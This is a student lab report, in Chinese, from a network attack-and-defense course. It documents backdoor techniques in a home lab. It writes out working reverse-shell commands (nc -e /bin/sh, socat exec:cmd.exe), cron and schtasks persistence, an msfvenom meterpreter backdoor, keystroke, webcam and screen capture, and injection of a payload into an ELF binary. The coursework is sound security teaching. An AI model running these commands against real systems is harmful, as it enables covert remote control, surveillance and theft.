首页 > 其他分享 >20222319 2024-2025-1 《网络与系统攻防技术》实验二实验报告

20222319 2024-2025-1 《网络与系统攻防技术》实验二实验报告

时间:2024-10-20 15:33:00浏览次数:1  
标签:2319 windows 主机 虚拟机 linux 2024 2025 20222319 socat

1.实验内容

本周继续课堂学习了缓冲区溢出的相关知识,面向本次实验,主要学习了后门程序的生成方法,用ncat、socat实现两台计算机间互传文件的方法,体会了通过msf工具与执行好的后门程序实现对被攻击计算机的监听过程。

1.1实验内容目录

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

1.2实验要求

(1)例举你能想到的一个后门进入到你系统中的可能方式?

来历不明的u盘,网络上暗藏恶意的链接,邮件箱重不怀好意的钓鱼链接,主要目的即将后门软件装到目标计算机中

(2)例举你知道的后门如何启动起来(win及linux)的方式?

windows中和linux中都可通过任务计划表定时启动某个后门软件,或者修改注册表启动项使后门软件在开机时自启动,或将相应payload写进正常的程序中,当程序被启动执行时即可随之启动。

Meterpreter有哪些给你映像深刻的功能?

实验中该工具能生成后门软件,并通过后门软件获取主机摄像头、屏幕、键盘等等敏感信息,能修改主机的文件,提高后门进程权限,对被攻击者产生很大的威胁。

(4)如何发现自己有系统有没有被安装后门?

启动杀毒软件进行检测————最简单高效
查看系统进程中是否存在可疑进程
定时查看系统日志,寻找异常登录尝试、未知服务启动或异常系统调用。

2.实验过程

2.1使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

2.1.1查看主机与虚拟机的ipv4地址

在windows主机命令行中输入ipconfig,由图可知主机ip为192.168.1.110
在linux虚拟机命令行中输入ifconfig,由图可知虚拟机ipv4地址为192.168.56.103

2.1.2使用netcat在主机监听2319端口,操作linux的Shell

在windows主机命令行中输入ncat.exe -l -p 2319,来监听2319端口的信息,其中ncat.exe表示netcat程序,-l表示进行监听,-p 2319表示端口2319,回车后如图,且等待linux虚拟机的操作

在linux虚拟机命令行中输入nc 192.168.1.110 2319 -e /bin/sh,来连接目标主机的端口,使主机执行linux虚拟机上的Shell,其中nc表示netcat,192.168.1.110即目标主机的ip地址,2319是目标主机的目标端口,-e表示执行,/bin/sh即linux系统中标准Shell的位置,回车后主机命令行即可操作Shell,执行结果如下图

2.1.3使用cron启动定时项目,在windows主机中执行Shell

(1)cron任务一

在linux虚拟机命令行中输入crontab -e

并在时程表中写入28 * * * * /bin/netcat 192.168.1.110 2319 -e /bin/sh,表示在每个小时的28分向目标主机192.168.1.110的2319端口提供linux的Shell。然后输入:wq保存退出

未到相应时间(28分)前保持windows主机处于监听2319端口的状态,此时无论输入什么主机命令行中都不会有反应,直到28的到来,主机即可操作linux虚拟机中的Shell。

(2)cron任务二

此时打开路径/var/spool/cron/crontabs,可发现该目录下存在一个名为root的文件,

使用vi root打开可见我们之前向其中添加的时程表任务,说明我们设定好的时程表任务是属于root用户的。然后记得:wq退出。

再于windows命令行(仍在操作linux虚拟机的Shell时)中输入echo "* * * * * echo "20222319zzs" > /home/20222319zzs/Desktop/20222319zzs.txt" > /var/spool/cron/crontabs/root,直接设置一个每分钟执行一次的任务。使用crontab -l可以查看目前的时程表任务,如图所示,当前任务已被写入。

2.2使用socat获取主机操作Shell, 任务计划启动

2.2.1通过socat执行主机的cmd程序

从附件中下载好socat软件后,
在windows主机中socat文件的目录下打开命令行,输入socat.exe tcp-listen:2319 exec:cmd.exe,pty,stderr

socat.exe 表示在windows中执行该程序
tcp-listen:2319 这部分指定了 socat 要监听的TCP端口
exec: 这部分指定了当有连接到达时 socat 需要执行的命令
cmd.exe 是Windows的命令行解释器
pty:这个选项告诉 socat 为 cmd.exe 分配一个伪终端
stderr:这个选项指示 socat 将 cmd.exe 的标准错误流也转发给连接的客户端

然后在虚拟机中命令行中输入socat - tcp:192.168.1.110:2319,即可进入windows主机的cmd命令行中,可执行相应的cmd操作

2.2.2在windows主机中编写一个exe程序

我的程序源码、相关文件、文本初始内容如图所示
在该程序主要用于将系统时间与字符串以追加模式写入文本20222319zzs.txt中。


2.2.3在虚拟机中通过windows的任务计划程序创建启动一个windows任务

在虚拟机中成功挟持了windows的cmd程序的linux命令行输入chcp 65001修改输出字符的编码方式,将乱码变为可读

再输入schtasks /create /sc minute /mo 1 /tn “20222319zzs_socat” /tr E:\CS\CSex2.exe使得每分钟都调用一次CSex2.exe程序,向目标文档写入内容,
命令行反馈如下,任务计划中出现20222319zzs_socat任务,如图则任务写入成功


2.3使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

2.3.1在虚拟机端生成后门文件

首先在虚拟机命令行中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=2319 -f exe > 20222319BackDoor.exe

msfvenom ——这是Metasploit框架中的一个工具,用于生成恶意可执行文件即payload

-p windows/meterpreter/reverse_tcp windows ——表示目标操作系统,meterpreter 是一种payload,reverse_tcp 表示连接类型为反向tcp连接

LHOST=192.168.56.103 ——监听器的主机地址为192.168.56.103,即攻击者的ip

LPORT=2319 ——监听器的目标端口号为2319,即攻击者的端口

-f exe ——表示最后生成一个exe文件

2.3.2通过ncat将后门文件传输至windows主机端

在主机中进入ncat软件所在目录下,进入命令行程序,输入ncat.exe -lv 2319 > "E:\CS\EX2\20222319BackDoor.exe",让windows的netcat监听2319端口并等待接受后门文件
在虚拟机中打开linux命令行,输入nc 192.168.1.110 2319 < 20222319BackDoor.exe

如图则传输成功。

2.3.3运行msf工具,执行后门文件,获取主机Shell

在虚拟机linux命令行中输入msfconsole进入msf控制台
依次输入以下指令

use exploit/multi/handler
设置一个能够处理多种类型的payload的监听器(handler),用于处理传入连接

set payload windows/meterpreter/reverse_tcp
使用名为reverse_tcp的payload来建立会话,该payload会让目标系统反向连接回攻击者的机器。该payload针对的是windows的系统。

set LHOST 192.168.56.103
攻击者的ip,用于收取监听数据

set LPORT 2319
攻击者的端口

exploit
开始监听

然后马上在windows主机上执行后门文件,要么在命令行里后门文件所在目录下输入.\20222319BackDoor.exe,要么直接在文件夹里双击运行
即可实现虚拟机获取主机的Shell

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

2.4.1使用msf获取目标主机音频、摄像头、屏幕与击键记录的后门

在2.3的基础上,依次执行下述指令,顺利获取了屏幕截图与电脑摄像头照片,
音频信息未成功是因为本台电脑并无相应的录音硬件,结果是正常的。
record_mic获取音频信息
screenshot立刻截屏并获取截屏照片
webcam_snap立刻使用摄像头拍照并获取图片


通过以下指令,成功获取攻击目标的键盘使用记录

keyscan_start获取击键记录(开始)
keyscan_dump获取击键记录(结束)

2.4.2尝试提升攻击者在目标主机里的权限

在虚拟机msf界面里输入getuid,得到当前用户名DESKTOP-1N5KFG6\曾德帅
再输入getsystem尝试提升该用户的权限,结果超时,提权失败。
在输入getprivs可以查看当前进程所拥有的权限

可见,当前进程拥有

更改通知权限(SeChangeNotifyPrivilege)
增加工作集权限(SeIncreaseWorkingSetPrivilege)
关机权限(SeShutdownPrivilege)
时区权限(SeTimeZonePrivilege)
弹出权限(SeUndockPrivilege)

2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

在虚拟机linux命令行里输入msfvenom -p linux/x86/meterpreter/reverse_tcp LHoST=192.168.56.103 LPORT=2319 -x /home/20222319zzs/Desktop/pwn_EX2 -f elf > pwn_ex2
生成一份针对Linux平台上的反向TCP meterpreter payload,并将其注入到pwn_EX2中,生成一份新的pwn_ex2文件。

打开另一个终端,输入msfconsole进入msf控制台,
依次输入以下指令,与2.3大致相同,有一处改变

use exploit/multi/handler
设置一个能够处理多种类型的payload的监听器(handler),用于处理传入连接

set payload linux/x86/meterpreter/reverse_tcp
使用名为reverse_tcp的payload来建立会话,该payload会让目标系统反向连接回攻击者的机器。该payload针对的是linux的x86_64系统。

set LHOST 192.168.56.103
攻击者的ip,用于收取监听数据

set LPORT 2319
攻击者的端口

exploit
开始监听

然后需要在前一个终端输入chmod a+x ./pwn_20222319ex2为新生成的文件赋予执行权限
输入./pwn_20222319ex2执行该文件,运行payload。


最终成功获取反弹连接Shell。

3.问题及解决方案

  • 问题1:时程表中设定每分钟向linux桌面以文本输入字符串,但三分钟过去文本毫无变化

问题1解决方案:重启kali虚拟机,即可看见一条写入记录,因为新一条会持续覆盖旧的一条字符串。可能在虚拟机中时程表的内容需要重启才能开始执行。

  • 问题2:在通过socat获取主机Shell中,输入指令socat.exe tcp-listen:2319 exec:cmd.exe,pty,stderr报错如下。

问题2解决方案:这一问题发生在第二次进行实验时,在第一次实验中我使用的是实验附件所给的socat安装包,并未报这一错误,但在第二次进行实验时由于网络ip的变化我选择重做实验,便发生了这一报错,于是我又重新安装了一次socat,但还是一样报错。

然后我看其反馈内容显示不能计算 FAST_CWD 指针,网上资料显示最可能是cygwin版本过低,但我在下载好最新版cygwin安装包安装后并没有解决这一问题。

最终我是通过同学找到的另外一份socat安装包,将其安装覆盖原来的socat再进行实验后才解决了这一问题。安装包网址为https://github.com/tech128/socat-1.7.3.0-windows

  • 问题3:crontab定时任务自动不能执行,手动可以执行

问题3解决方案:crontab的执行和系统的环境变量有关系的。发现脚本中需要添加必要的环境变量才可以使脚本自动执行,具体可以参考这篇文章,因为我也不是很懂https://blog.csdn.net/xingyue0422/article/details/83012000

  • 问题4:msf在进行监听时返回Meterpreter session 6 is not valid and will be closed,如图

问题4解决方案:该问题原因出在我对于生成反tcp payload的代码并未真正掌握,windows系统与linux系统的指令混用了,后门程序放在windows里就用针对windows的payload格式指令,放在linux就用linux的payload格式指令

4.学习感悟、思考等

经过本次实验,我基本上掌握了通过后门软件获取主机权限的原理,切实体会到黑客获取被攻击者文件、屏幕、摄像头、键盘输入记录等敏感信息内容权限的具体方案。实际上,msf作为集成了渗透测试全流程的渗透工具,本实验中其获取主机后门权限后即可在msf控制台中输入相关简短指令就能实现各种各样的攻击,我所用到的指令仅仅一小部分,可想而知msf在渗透测试中该有多全面而强大了。
并且,进行实验时最让人难受的就是刚刚通过后门软件获取主机Shell,劫持了屏幕权限并成功截图,正准备测试其他权限时,后门软件转眼间就被360消灭了,因为我设置杀毒软件下线1小时来保证我的实验环境,结果实际上实验耗时不止1小时。本实验中后门软件我是通过ncat进行传输的,实际上防火墙并未对这一传输进行拦截,只有杀毒软件在第一时间检测到后门软件的存在,并立刻查杀。因此杀毒软件在日常生活中是相当有必要安装,就算一年中364天都闲置那也是可以接受,我们只需要他能在那唯一的一天成功查杀入侵如我们计算机的病毒,作为杀毒软件,其意义便实现了。
此外,我在查阅网络资料解决实验中遇到的问题时,深刻体会到后门技术是一把利器,可以保家卫国,亦可违法犯罪,使用者必须守正本心、遵纪守法、慎重使用。

参考资料

标签:2319,windows,主机,虚拟机,linux,2024,2025,20222319,socat
From: https://www.cnblogs.com/20222319zzs/p/18473769

相关文章

  • 2024-2025-1 20231309《计算机基础与程序设计》第三周助教总结
    课程答疑最近同学们的提问大多都是与虚拟机、Linux命令有关,往往是在具体操作上出现了未曾意料的报错。而出现此类问题的主要原因包括:操作不规范,如Linux命令输入不准确等解决方案:出现报错后首先检查自己输入的命令是否准确无误,例如是否少空格少参数等,再看是否有缺漏步骤等。......
  • 2024 强网拟态Writeups
    ez_re直接各种调试/Trace。输入长度是0x38,输入经过三次变换,第一次为+0x40(其中存在反调试使用x64dbg隐藏PEB即可)第二轮Trace结果是这样,看起来很复杂,其实就是三个xor的定义式,0xE9FCF789^0xB62DD00^0xE29E2AF6=0x7f,就是xor0x7f第三轮是一个XTEA每一步多了个x......
  • 20222302 2024-2025-1 《网络与系统攻防技术》实验二实验报告
    1.实验内容本次实验旨在通过实际操作理解并实践网络攻击中的后门原理,包括使用不同的工具和技术来获取目标主机的操作Shell、执行特定任务、收集敏感信息以及进行权限提升;本次实验需要我们使用nc实现win,mac,Linux间的后门连接:meterpreter的应用、MSFPOST模块的应用,实验可以分为以......
  • 2024-2025-1 20241305 《计算机基础与程序设计》第四周学习总结
    作业信息这个作业属于哪个课程2024-2025-1-计算机基础与程序设计(https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP))这个作业要求在哪里2024-2025-1计算机基础与程序设计第四周作业(https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP/homework/13276))......
  • 2024.10.20 1424版
    起于《海奥华预言》的思考◆地球管理结构和参考持续更新中...... 英文地址:https://github.com/zhuyongzhe/Earth/tags中文地址:https://www.cnblogs.com/zhuyongzhe85作者:朱永哲 ---------------------------------------------------------------------------------......
  • csp2024 游记
    前言今年赛前这段时间或许算得上是我OI生涯中最摆的一段时间了。每天到机房无非就是胡乱的看一些题,趴在桌子上,或者是写whk作业。当然这可能也和最近的状态有关。或许我也只有在刚开始的那几天的在线的,其它时候基本上啥都没干。本来今年是不太想停课的,可最终因为种种原因还是......
  • 2024.10.20 1315版
    起于《海奥华预言》的思考◆地球管理结构和参考持续更新中...... 英文地址:https://github.com/zhuyongzhe/Earth/tags中文地址:https://www.cnblogs.com/zhuyongzhe85作者:朱永哲 ---------------------------------------------------------------------------------......
  • 2024-2025-1 20241403《计算机基础与程序设计》第四周学习总结
    学期(如2024-2025-1)学号(如:20241403)《计算机基础与程序设计》第四周学习总结作业信息这个作业属于哪个课程<班级的链接>(如2024-2025-1-计算机基础与程序设计)这个作业要求在哪里<作业要求的链接>(如2024-2025-1计算机基础与程序设计第四周作业)这个作业的目标门电......
  • 中国各省/地级市/县域统计年鉴面板数据三合一(2024全新整理)
    文章目录数据下载地址数据指标说明一、数据名称:中国县域统计年鉴面板数据二、数据名称:中国城市统计年鉴面板数据-全市/市辖区版三、数据名称:中国各省统计面板数据项目备注数据下载地址数据下载地址点击这里下载数据数据指标说明统计年鉴面板数据给大家的研究工作......
  • 随意门导航zlibrary镜像地址入口(2024更新)
    随意门导航是一个集实用性与便捷性于一体的综合性网址导航网站,它为广大网民提供了一个快速访问各类热门网站和实用工具的便捷平台。在这个网站上,你可以轻松找到涵盖电子书下载、学术资源、生活工具、常用查询以及音乐在线听等多个领域的网址链接。随意门导航的设计简洁明了,用......